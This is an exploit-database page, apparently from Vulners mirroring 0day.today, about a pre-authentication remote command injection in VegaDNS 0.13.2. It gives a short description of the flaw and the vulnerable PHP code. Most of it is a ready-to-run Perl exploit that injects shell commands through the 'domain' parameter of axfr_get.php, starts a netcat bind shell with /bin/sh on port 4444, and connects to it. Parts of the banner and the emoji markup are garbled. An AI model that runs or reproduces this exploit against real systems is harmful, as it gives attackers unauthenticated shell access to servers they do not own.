Vulners
Lucene search
VegaDNS 0.13.2 - Remote Command Injection Exploit
#!/usr/bin/perl
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
βββββββββββ ββββββββββ βββ βββββββ ββββββββββββ
βββββββββββββββββββββββββββ βββββββββββββββββββββ
ββββββ ββββββ βββββββββββ βββ ββββββ βββ
ββββββ ββββββ βββββββ βββ βββ ββββββ βββ
ββββββββββββ ββββββ ββββββββββββββββββββ βββ
βββββββββββ ββββββ ββββββββ βββββββ βββ βββ
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# β Β· β Β· β Β· β Β· <img draggable="false" class="emoji" alt="β" src="https://s.w.org/images/core/emoji/2/svg/2196.svg"> Β· <img draggable="false" class="emoji" alt="β" src="https://s.w.org/images/core/emoji/2/svg/2197.svg"> Β· <img draggable="false" class="emoji" alt="β" src="https://s.w.org/images/core/emoji/2/svg/2198.svg"> Β· <img draggable="false" class="emoji" alt="β" src="https://s.w.org/images/core/emoji/2/svg/2199.svg">
print " β β β *k* β β *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
# 0day.today [2018-02-17] #Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Sep 2016 00:00Current
7.1High risk
Vulners AI Score7.1